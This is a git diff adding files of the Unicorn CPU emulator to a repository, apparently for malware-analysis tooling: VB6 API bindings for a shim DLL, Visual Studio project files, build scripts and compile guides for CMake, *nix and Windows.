+'/*
+' Unregister (remove) a hook callback.
+' This API removes the hook callback registered by uc_hook_add().
+' NOTE: this should be called only when you no longer want to trace.
+' After this, @hh is invalid, and no longer usable.
+'
+' @uc: handle returned by uc_open()
+' @hh: handle returned by uc_hook_add()
+'
+' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+' for detailed error).
+'*/ +'UNICORN_EXPORT +'uc_err uc_hook_del(uc_engine *uc, uc_hook hh); +Public Declare Function ucs_hook_del Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal hHook As Long) As uc_err + + + +'/* +' Map memory in for emulation. +' This API adds a memory region that can be used by emulation. +' +' @uc: handle returned by uc_open() +' @address: starting address of the new memory region to be mapped in. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the new memory region to be mapped in. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' @perms: Permissions for the newly mapped region. +' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, +' or this will return with UC_ERR_ARG error. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +Public Declare Function ucs_mem_map Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot) As uc_err + + + +'/* +' Map existing host memory in for emulation. +' This API adds a memory region that can be used by emulation. +' +' @uc: handle returned by uc_open() +' @address: starting address of the new memory region to be mapped in. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the new memory region to be mapped in. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' @perms: Permissions for the newly mapped region. +' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, +' or this will return with UC_ERR_ARG error. +' @ptr: pointer to host memory backing the newly mapped memory. 
This host memory is +' expected to be an equal or larger size than provided, and be mapped with at +' least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); +Public Declare Function ucs_mem_map_ptr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot, ByVal ptr As Long) As uc_err + + + +'/* +' Unmap a region of emulation memory. +' This API deletes a memory mapping from the emulation memory space. +' +' @uc: handle returned by uc_open() +' @address: starting address of the memory region to be unmapped. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the memory region to be modified. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); +Public Declare Function ucs_mem_unmap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long) As uc_err + + +'/* +' Set memory permissions for emulation memory. +' This API changes permissions on an existing memory region. +' +' @uc: handle returned by uc_open() +' @address: starting address of the memory region to be modified. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the memory region to be modified. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' @perms: New permissions for the mapped region. +' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, +' or this will return with UC_ERR_ARG error. 
+'
+' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+' for detailed error).
+'*/
+'UNICORN_EXPORT
+'uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms);
+Public Declare Function ucs_mem_protect Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perm As uc_prot) As uc_err
+
+
+
+'/*
+' Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr()
+' This API allocates memory for @regions, and user must free this memory later
+' by free() to avoid leaking memory.
+' NOTE: memory regions may be split by uc_mem_unmap()
+'
+' @uc: handle returned by uc_open()
+' @regions: pointer to an array of uc_mem_region struct. This is allocated by
+' Unicorn, and must be freed by user later
+' @count: pointer to number of struct uc_mem_region contained in @regions
+'
+' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+' for detailed error).
+'*/
+'UNICORN_EXPORT
+'uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count);
+'simplified for vb use: uc_err __stdcall getMemMap(uc_engine *uc, _CollectionPtr *pColl){
+
+'fills a collection with csv values of all memory regions..
+Public Declare Function get_memMap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef col As Collection) As uc_err
+
+
+'/*
+' Allocate a region that can be used with uc_context_{save,restore} to perform
+' quick save/rollback of the CPU context, which includes registers and some
+' internal metadata. Contexts may not be shared across engine instances with
+' differing arches or modes.
+'
+' @uc: handle returned by uc_open()
+' @context: pointer to a uc_engine*. This will be updated with the pointer to
+' the new context on successful return of this function.
+'
+' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+' for detailed error).
+'*/ +'UNICORN_EXPORT +'uc_err uc_context_alloc(uc_engine *uc, uc_context **context); +Public Declare Function ucs_context_alloc Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef context As Long) As uc_err + + + +'/* +' Free the resource allocated by uc_context_alloc. +' +' @context: handle returned by uc_context_alloc() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_free(void* mem); +Public Declare Function ucs_free Lib "ucvbshim.dll" (ByVal mem As Long) As uc_err + + + +'/* +' Save a copy of the internal CPU context. +' This API should be used to efficiently make or update a saved copy of the +' internal CPU state. +' +' @uc: handle returned by uc_open() +' @context: handle returned by uc_context_alloc() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_context_save(uc_engine *uc, uc_context *context); +Public Declare Function ucs_context_save Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err + + + +'/* +' Restore the current CPU context from a saved copy. +' This API should be used to roll the CPU context back to a previous +' state saved by uc_context_save(). +' +' @uc: handle returned by uc_open() +' @buffer: handle returned by uc_context_alloc that has been used with uc_context_save +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). 
+'*/ +'UNICORN_EXPORT +'uc_err uc_context_restore(uc_engine *uc, uc_context *context); +Public Declare Function ucs_context_restore Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err + + + +'uses libdasm to retrieve the 32bit disassembly at a specified va +'int __stdcall disasm_addr(uc_engine *uc, int va, char *str, int bufLen){ +Public Declare Function disasm_addr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Long, ByVal buf As String, ByVal size As Long) As Long + + +'simplified access to map and write data to emu memory +'uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){ +Public Declare Function mem_write_block Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef data As Byte, ByVal size As Long, ByVal perm As Long) As uc_err + +Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long +Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long + +'api version of the below.. 
+
+'Function err2str(e As uc_err) As String
+' Dim lpStr As Long
+' Dim length As Long
+' Dim buf() As Byte
+'
+' lpStr = ucs_strerror(e)
+' If lpStr = 0 Then Exit Function
+'
+' length = lstrlen(lpStr)
+' If length = 0 Then Exit Function
+'
+' ReDim buf(1 To length)
+' CopyMemory buf(1), ByVal lpStr, length
+'
+' err2str = StrConv(buf, vbUnicode, &H409)
+'
+'End Function
+
+Function err2str(e As uc_err) As String
+
+ err2str = "Unknown error code: " & e
+
+ If e = uc_err_ok Then err2str = "No error: everything was fine"
+ If e = UC_ERR_NOMEM Then err2str = "Out-Of-Memory error: uc_open(), uc_emulate()"
+ If e = UC_ERR_ARCH Then err2str = "Unsupported architecture: uc_open()"
+ If e = UC_ERR_HANDLE Then err2str = "Invalid handle"
+ If e = UC_ERR_MODE Then err2str = "Invalid/unsupported mode: uc_open()"
+ If e = UC_ERR_VERSION Then err2str = "Unsupported version (bindings)"
+ If e = UC_ERR_READ_UNMAPPED Then err2str = "Quit emulation due to READ on unmapped memory: uc_emu_start()"
+ If e = UC_ERR_WRITE_UNMAPPED Then err2str = "Quit emulation due to WRITE on unmapped memory: uc_emu_start()"
+ If e = UC_ERR_FETCH_UNMAPPED Then err2str = "Quit emulation due to FETCH on unmapped memory: uc_emu_start()"
+ If e = UC_ERR_HOOK Then err2str = "Invalid hook type: uc_hook_add()"
+ If e = UC_ERR_INSN_INVALID Then err2str = "Quit emulation due to invalid instruction: uc_emu_start()"
+ If e = UC_ERR_MAP Then err2str = "Invalid memory mapping: uc_mem_map()"
+ If e = UC_ERR_WRITE_PROT Then err2str = "Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start()"
+ If e = UC_ERR_READ_PROT Then err2str = "Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start()"
+ If e = UC_ERR_FETCH_PROT Then err2str = "Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start()"
+ If e = UC_ERR_ARG Then err2str = "Inavalid argument provided to uc_xxx function (See specific function API)"
+ If e = UC_ERR_READ_UNALIGNED Then err2str = "Unaligned read"
+ If e = UC_ERR_WRITE_UNALIGNED
Then err2str = "Unaligned write" + If e = UC_ERR_FETCH_UNALIGNED Then err2str = "Unaligned fetch" + If e = UC_ERR_HOOK_EXIST Then err2str = "hook for this event already existed" + If e = UC_ERR_RESOURCE Then err2str = "Insufficient resource: uc_emu_start()" + If e = UC_ERR_EXCEPTION Then err2str = "Unhandled CPU exception" + +End Function + +Function memType2str(t As uc_mem_type) + + memType2str = "Unknown memType: " & t + + If t = UC_MEM_READ Then memType2str = "Memory is read from" + If t = uc_mem_write Then memType2str = "Memory is written to" + If t = UC_MEM_FETCH Then memType2str = "Memory is fetched" + If t = UC_MEM_READ_UNMAPPED Then memType2str = "Unmapped memory is read from" + If t = UC_MEM_WRITE_UNMAPPED Then memType2str = "Unmapped memory is written to" + If t = UC_MEM_FETCH_UNMAPPED Then memType2str = "Unmapped memory is fetched" + If t = UC_MEM_WRITE_PROT Then memType2str = "Write to write protected, but mapped, memory" + If t = UC_MEM_READ_PROT Then memType2str = "Read from read protected, but mapped, memory" + If t = UC_MEM_FETCH_PROT Then memType2str = "Fetch from non-executable, but mapped, memory" + If t = UC_MEM_READ_AFTER Then memType2str = "Memory is read from (successful access)" + +End Function + + + + + + + +'--------------------- [ callback support ] --------------------------------------------- + +'so the callbacks must live in a module (vb6 language limitation/safety feature) +'we use a simple lookup mechanism to support multiple instances + +Function findInstance(ptr As Long) As ucIntel32 + On Error Resume Next + Set findInstance = instances("objptr:" & ptr) +End Function + +'in case we want to keep userdata for something else..this is just as easy.. 
+Function findInstanceByUc(uc As Long) As ucIntel32 + Dim u As ucIntel32 + For Each u In instances + If u.uc = uc Then + Set findInstanceByUc = u + Exit Function + End If + Next +End Function + +'typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); +Public Sub code_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_code_hook address, size +End Sub + +Public Sub block_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_block_hook address, size +End Sub + +'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); +Public Sub mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_mem_hook t, address, size, value +End Sub + +'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); +Public Function invalid_mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) As Long + 'return 0 to stop emulation, 1 to continue + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Function + invalid_mem_hook = u.internal_invalid_mem_hook(t, address, size, value) +End Function + +'typedef void (*vb_cb_hookintr_t)(uc_engine *uc,uint32_t intno, void *user_data); +Public Sub interrupt_hook(ByVal uc As Long, ByVal intno As Long, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) 
+ If u Is Nothing Then Exit Sub + u.internal_interrupt_hook intno +End Sub + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.sln b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.sln new file mode 100644 index 0000000..dd7f017 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 10.00 +# Visual Studio 2008 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ucvbshim", "ucvbshim.vcproj", "{6FC797B7-2985-49C8-92CD-CA985AF3511C}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.ActiveCfg = Debug|Win32 + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.Build.0 = Debug|Win32 + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.ActiveCfg = Release|Win32 + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.vcproj b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.vcproj new file mode 100644 index 0000000..83f7952 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.vcproj @@ -0,0 +1,204 @@ +<?xml version="1.0" encoding="Windows-1252"?> +<VisualStudioProject + ProjectType="Visual C++" + Version="9.00" + Name="ucvbshim" + ProjectGUID="{6FC797B7-2985-49C8-92CD-CA985AF3511C}" + RootNamespace="My1" + Keyword="Win32Proj" + TargetFrameworkVersion="196613" + > + <Platforms> + <Platform + Name="Win32" + /> + </Platforms> + <ToolFiles> + </ToolFiles> + <Configurations> + <Configuration + Name="Debug|Win32" + 
OutputDirectory="$(SolutionDir)$(ConfigurationName)" + IntermediateDirectory="$(ConfigurationName)" + ConfigurationType="2" + CharacterSet="2" + > + <Tool + Name="VCPreBuildEventTool" + /> + <Tool + Name="VCCustomBuildTool" + /> + <Tool + Name="VCXMLDataGeneratorTool" + /> + <Tool + Name="VCWebServiceProxyGeneratorTool" + /> + <Tool + Name="VCMIDLTool" + /> + <Tool + Name="VCCLCompilerTool" + Optimization="0" + AdditionalIncludeDirectories="./../../include/" + PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE;" + MinimalRebuild="true" + BasicRuntimeChecks="3" + RuntimeLibrary="1" + UsePrecompiledHeader="0" + WarningLevel="3" + DebugInformationFormat="4" + /> + <Tool + Name="VCManagedResourceCompilerTool" + /> + <Tool + Name="VCResourceCompilerTool" + /> + <Tool + Name="VCPreLinkEventTool" + /> + <Tool + Name="VCLinkerTool" + OutputFile="./ucvbshim.dll" + LinkIncremental="2" + GenerateManifest="false" + ModuleDefinitionFile="" + GenerateDebugInformation="true" + SubSystem="1" + TargetMachine="1" + /> + <Tool + Name="VCALinkTool" + /> + <Tool + Name="VCManifestTool" + EmbedManifest="false" + /> + <Tool + Name="VCXDCMakeTool" + /> + <Tool + Name="VCBscMakeTool" + /> + <Tool + Name="VCFxCopTool" + /> + <Tool + Name="VCAppVerifierTool" + /> + <Tool + Name="VCPostBuildEventTool" + /> + </Configuration> + <Configuration + Name="Release|Win32" + OutputDirectory="$(SolutionDir)$(ConfigurationName)" + IntermediateDirectory="$(ConfigurationName)" + ConfigurationType="2" + CharacterSet="2" + WholeProgramOptimization="1" + > + <Tool + Name="VCPreBuildEventTool" + /> + <Tool + Name="VCCustomBuildTool" + /> + <Tool + Name="VCXMLDataGeneratorTool" + /> + <Tool + Name="VCWebServiceProxyGeneratorTool" + /> + <Tool + Name="VCMIDLTool" + /> + <Tool + Name="VCCLCompilerTool" + Optimization="2" + EnableIntrinsicFunctions="true" + AdditionalIncludeDirectories="./../../include/" + PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE;" + RuntimeLibrary="0" + EnableFunctionLevelLinking="true" + 
UsePrecompiledHeader="0" + WarningLevel="3" + DebugInformationFormat="3" + /> + <Tool + Name="VCManagedResourceCompilerTool" + /> + <Tool + Name="VCResourceCompilerTool" + /> + <Tool + Name="VCPreLinkEventTool" + /> + <Tool + Name="VCLinkerTool" + OutputFile="./ucvbshim.dll" + LinkIncremental="1" + GenerateManifest="false" + GenerateDebugInformation="true" + SubSystem="1" + OptimizeReferences="2" + EnableCOMDATFolding="2" + TargetMachine="1" + /> + <Tool + Name="VCALinkTool" + /> + <Tool + Name="VCManifestTool" + EmbedManifest="false" + /> + <Tool + Name="VCXDCMakeTool" + /> + <Tool + Name="VCBscMakeTool" + /> + <Tool + Name="VCFxCopTool" + /> + <Tool + Name="VCAppVerifierTool" + /> + <Tool + Name="VCPostBuildEventTool" + /> + </Configuration> + </Configurations> + <References> + </References> + <Files> + <Filter + Name="Source Files" + Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx" + UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" + > + <File + RelativePath=".\main.cpp" + > + </File> + </Filter> + <Filter + Name="Header Files" + Filter="h;hpp;hxx;hm;inl;inc;xsd" + UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" + > + <File + RelativePath="..\..\include\unicorn\unicorn.h" + > + </File> + <File + RelativePath="..\..\include\x86.h" + > + </File> + </Filter> + </Files> + <Globals> + </Globals> +</VisualStudioProject> diff --git a/ai_anti_malware/unicorn/unicorn-master/cmake.sh b/ai_anti_malware/unicorn/unicorn-master/cmake.sh new file mode 100644 index 0000000..7806a0e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/cmake.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Unicorn Emulator Engine (www.unicorn-engine.org) +# Usage: cmake.sh [x86] [arm] [aarch64] [m68k] [mips] [sparc] +# By chenhuitao 2019 + +FLAGS="-DCMAKE_BUILD_TYPE=Release" + +UNICORN_ARCH="${*}" + +if [ -z "${UNICORN_ARCH}" ]; then + cmake "${FLAGS}" .. +else + cmake "${FLAGS}" "-DUNICORN_ARCH=${UNICORN_ARCH}" .. 
+fi + +make -j8 diff --git a/ai_anti_malware/unicorn/unicorn-master/config.mk b/ai_anti_malware/unicorn/unicorn-master/config.mk new file mode 100644 index 0000000..c3621fb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/config.mk @@ -0,0 +1,30 @@ +# Unicorn Emulator Engine +# By Nguyen Anh Quynh, 2015 + +# This file contains all customized compile options for Unicorn emulator. +# Consult docs/COMPILE.md & docs/README.md for more details. + +################################################################################ +# Compile with debug info when you want to debug code. +# Change this to 'no' for release edition. + +UNICORN_DEBUG ?= yes + +################################################################################ +# Specify which archs you want to compile in. By default, we build all archs. + +UNICORN_ARCHS ?= x86 m68k arm aarch64 mips sparc + + +################################################################################ +# Change 'UNICORN_STATIC = yes' to 'UNICORN_STATIC = no' to avoid building +# a static library. + +UNICORN_STATIC ?= yes + + +################################################################################ +# Change 'UNICORN_SHARED = yes' to 'UNICORN_SHARED = no' to avoid building +# a shared library. + +UNICORN_SHARED ?= yes diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/BHUSA2015-unicorn.pdf b/ai_anti_malware/unicorn/unicorn-master/docs/BHUSA2015-unicorn.pdf new file mode 100644 index 0000000..9096197 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/BHUSA2015-unicorn.pdf differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-CMAKE.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-CMAKE.md new file mode 100644 index 0000000..6e8be6c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-CMAKE.md @@ -0,0 +1,57 @@ +This documentation explains how to compile Unicorn with CMake on Windows or +*nix. 
+ +---- + +Requirements: + +- Windows: MicroSoft Visual Studio(>=2013). +- *nix: GNU gcc or clang to generate dynamic source files. + +Get CMake for free from http://www.cmake.org. + + +[1] To build Unicorn using Nmake of Windows SDK, do: + + mkdir build + cd build + ..\nmake.bat + + After this, find the samples test*.exe, unicorn.lib & unicorn.dll + in the same directory. + + +- To build Unicorn using Visual Studio, choose the generator accordingly to the + version of Visual Studio on your machine. For example, with Visual Studio 2013, do: + + mkdir build + cd build + cmake -G "Visual Studio 12" .. + + After this, find unicorn.sln in the same directory. Open it with Visual Studio + and build the solution including libraries & all test as usual. + + +[2] You can make sure the prior steps successfully worked by launching one of the + sample binary (sample_*.exe). + + +[3] You can also enable just one specific architecture by passing the architecture name + to either the cmake.sh or nmake.bat scripts. e.g.: + + ..\nmake.bat x86 + + Will just target the x86 architecture. The list of available architectures are: + X86 ARM AARCH64 M68K MIPS SPARC. + + +[4] You can also create an installation image with cmake, by using the 'install' target. + Use: + + cmake --build . --config Release --target install + + This will normally install an image in a default location (on MacOS and Linux, but this is not supported + on Windows). So in case you want to change the install location, set this when configuring CMake. + Use: `-DCMAKE_INSTALL_PREFIX=path` for instance, to put the installation in the 'path' subdirectory of + the build directory. + The default value of 'CMAKE_INSTALL_PREFIX' on *nix is '/usr/local'. 
diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-NIX.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-NIX.md new file mode 100644 index 0000000..6964d68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-NIX.md @@ -0,0 +1,164 @@ +This documentation explains how to compile, install & run Unicorn on MacOSX, +Linux, BSD, Solaris, Android & iOS. + +To compile for Microsoft Windows, see [COMPILE-WINDOWS.md](COMPILE-WINDOWS.md) + +---- + +[1] Tailor Unicorn to your need. + +Out of 6 archtitectures supported by Unicorn (Arm, Arm64, M68K, Mips, Sparc, +& X86), if you just need several selected archs, choose which ones you want +to compile in by editing "config.mk" before going to next steps. + +By default, all 6 architectures are compiled. If this is what you want, skip +to the section 2. + +The other way of customize Unicorn without having to edit config.mk is to +pass the desired options on the commandline to ./make.sh. Currently, +Unicorn supports 4 options, as follows. + + - UNICORN_ARCHS: specify list of architectures to compiled in. + - UNICORN_STATIC: build static library. + - UNICORN_SHARED: build dynamic (shared) library. + - UNICORN_QEMU_FLAGS: specify extra flags for qemu's configure script + +To avoid editing config.mk for these customization, we can pass their values to +make.sh, as follows. + + $ UNICORN_ARCHS="arm aarch64 x86" ./make.sh + +NOTE: on commandline, put these values in front of ./make.sh, not after it. + +For each option, refer to docs/README for more details. 
+ + + +[2] Compile and install from source on *nix + +To build Unicorn on *nix (such as MacOSX, Linux, *BSD, Solaris): + +- To compile for current platform, run: + + $ ./make.sh + + On Mac OS, to build non-universal binaries that includes only 64-bit code, + replace above command with: + + $ ./make.sh macos-universal-no + +- To cross-compile Unicorn on 64-bit Linux to target 32-bit binary, + cross-compile to 32-bit with: + + $ ./make.sh linux32 + + After compiling, install Unicorn with: + + $ sudo ./make.sh install + + For FreeBSD/OpenBSD, where sudo is unavailable, run: + + $ su; ./make.sh install + + Users are then required to enter root password to copy Unicorn into machine + system directories. + + Afterwards, run ./samples/sample_all.sh to test the sample emulations. + + + NOTE: The core framework installed by "./make.sh install" consist of + following files: + + /usr/include/unicorn/unicorn.h + /usr/include/unicorn/x86.h + /usr/include/unicorn/arm.h + /usr/include/unicorn/arm64.h + /usr/include/unicorn/mips.h + /usr/include/unicorn/ppc.h + /usr/include/unicorn/sparc.h + /usr/include/unicorn/m68k.h + /usr/lib/libunicorn.so (for Linux/*nix), or /usr/lib/libunicorn.dylib (OSX) + /usr/lib/libunicorn.a + + + +[3] Cross-compile for iOS from macOS. + +To cross-compile for iOS (iPhone/iPad/iPod), macOS with Xcode installed is required. + +- To cross-compile for iOS ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run: + + $ ./make.sh ios_armv7 + +- To cross-compile for iOS ArmV7s (iPad 4, iPhone 5C, iPad mini), run: + + $ ./make.sh ios_armv7s + +- To cross-compile for iOS Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run: + + $ ./make.sh ios_arm64 + +- To cross-compile for all iOS devices (armv7 + armv7s + arm64), run: + + $ ./make.sh ios + +Resulted files libunicorn.dylib, libunicorn.a & tests/test* can then +be used on iOS devices. + + + +[4] Cross-compile for Android + +To cross-compile for Android (smartphone/tablet), Android NDK is required. 
+ +- To cross-compile for Android Arm, run: + + $ NDK=~/android/android-ndk-r20 ./make.sh cross-android_arm + +- To cross-compile for Android Arm64, run: + + $ NDK=~/android/android-ndk-r20 ./make.sh cross-android_arm64 + +Resulted files libunicorn.so, libunicorn.a & tests/test* can then +be used on Android devices. + + + +[5] By default, "cc" (default C compiler on the system) is used as compiler. + +- To use "clang" compiler instead, run the command below: + + $ ./make.sh clang + +- To use "gcc" compiler instead, run: + + $ ./make.sh gcc + + + +[6] To uninstall Unicorn, run the command below: + + $ sudo ./make.sh uninstall + + + +[7] Language bindings + +Look for the bindings under directory bindings/, and refer to README file +of corresponding languages. + + + +[8] Unit tests + +Mac OS X users will also need the GNU version of binutils (for gobjcopy). +It can be easily installed with Homebrew: `brew install binutils`. + +Automated unit tests use the cmocka unit testing framework (https://cmocka.org/). +It can be installed in most Linux distros using the package manager, e.g. +`sudo yum install libcmocka libcmocka-devel`. +On Mac OS X with Homebrew: `brew install cmocka`. +You can also easily build and install it from source. + +You can run the tests by running `make test` in the project directory. If you don't +build some architecture support then the corresponding tests will fail when run. diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-WINDOWS.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-WINDOWS.md new file mode 100644 index 0000000..94744be --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-WINDOWS.md @@ -0,0 +1,184 @@ +To build Unicorn on Windows natively using Visual Studio, see docs under "msvc" +directory in root directory. + +The rest of this manual shows how to cross-compile Unicorn for Windows using +either MingW or Msys2. 
+ +To compile for Linux, Mac OS X and Unix-based OS, see [COMPILE-NIX.md](COMPILE-NIX.md) + +--- + + +[0] Dependencies + +For Windows, cross-compile requires Mingw. At the moment, it is confirmed that +Unicorn can be compiled either on Ubuntu or Windows. + +- On Ubuntu 14.04 64-bit, do: + + - Download DEB packages for Mingw64 from: + + https://launchpad.net/~greg-hellings/+archive/ubuntu/mingw-libs/+build/2924251 + + +- On Windows, install MinGW via package MSYS2 at https://msys2.github.io/ + + Follow the install instructions and don't forget to update the system packages with: + + $ pacman --needed -Sy bash pacman pacman-mirrors msys2-runtime + + Then close MSYS2, run it again from Start menu and update the rest with: + + $ pacman -Su + + Finally, install required toolchain to build C projects. + + - To compile for Windows 32-bit, run: + + $ pacman -S make + $ pacman -S mingw-w64-i686-toolchain + + - To compile for Windows 64-bit, run: + + $ pacman -S make + $ pacman -S mingw-w64-x86_64-toolchain + +- For Cygwin, "make", "gcc-core", "libpcre-devel", "zlib-devel" are needed. + + If apt-cyg is available, you can install these with: + + $ apt-cyg install make gcc-core libpcre-devel zlib-devel + + + +[1] Tailor Unicorn to your need. + +Out of 6 archtitectures supported by Unicorn (Arm, Arm64, M68K, Mips, Sparc, +& X86), if you just need several selected archs, choose which ones you want +to compile in by editing "config.mk" before going to next steps. + +By default, all 6 architectures are compiled. + +The other way of customize Unicorn without having to edit config.mk is to +pass the desired options on the commandline to ./make.sh. Currently, +Unicorn supports 4 options, as follows. + + - UNICORN_ARCHS: specify list of architectures to compiled in. + - UNICORN_STATIC: build static library. + - UNICORN_SHARED: build dynamic (shared) library. 
